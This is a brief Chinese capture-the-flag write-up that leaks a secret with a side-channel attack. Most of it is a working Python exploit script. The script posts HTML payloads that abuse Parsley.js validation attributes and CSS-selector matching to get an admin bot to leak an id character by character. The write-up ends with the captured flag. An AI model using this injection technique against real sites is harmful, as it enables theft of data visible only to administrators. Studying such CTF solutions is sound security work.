ArticleShare

  1. 在前端代码中得知:side channel attack

  2. exp如下

import requests
import time
import sys

def main(host, port):
    s = requests.Session()
    base_url = f"http://{host}:{port}/"
    res = s.get(base_url)
    pos = res.text.find('name="c" value="') + len('name="c" value="')
    csrftoken = res.text[pos:pos+16]

    ss = "abcdef0123456789"
    flag = ""

    for i in range(16):
        for j in ss:
            print("trying",j)
            payload = f'''<form data-parsley-validate>
                      <input data-parsley-required
                      data-parsley-trigger=\"blur\"
                      data-parsley-error-message=\"<input type=button id=like>\"
                      data-parsley-errors-container=\"a[href^=\'/lookup.php?id={flag + j}\']\"
                      autofocus>
                      </form>'''
            data = {'c': csrftoken, 'content': payload}
            res = s.post(base_url + "add.php", data=data, allow_redirects=False)
            #print(res.headers)
            location = res.headers['Location']
            pos = location.find('id=') + 3
            wp = location[pos:]
            data = {'c': csrftoken, 'id': wp}
            res = s.post(base_url + "admin.php", data=data)
            time.sleep(10)

            res = s.get(f"http://{host}:{port}/lookup.php?id={wp}")
            txt = res.text.replace("\n", "").replace("\r", "")
            if "Liked by</h3>admin" not in txt:
                flag += j
                print(i,flag)
                break

if __name__ == '__main__':
    main("********","*****")

  1. 如果中间出现没爆出来的就把前面爆出来的几位去掉最后一位,然后添加在flag前面继续爆就行

  2. flag如下

ctf{s1d3_ch4nn3l_attack_is_funny_bluecup2023_got_it}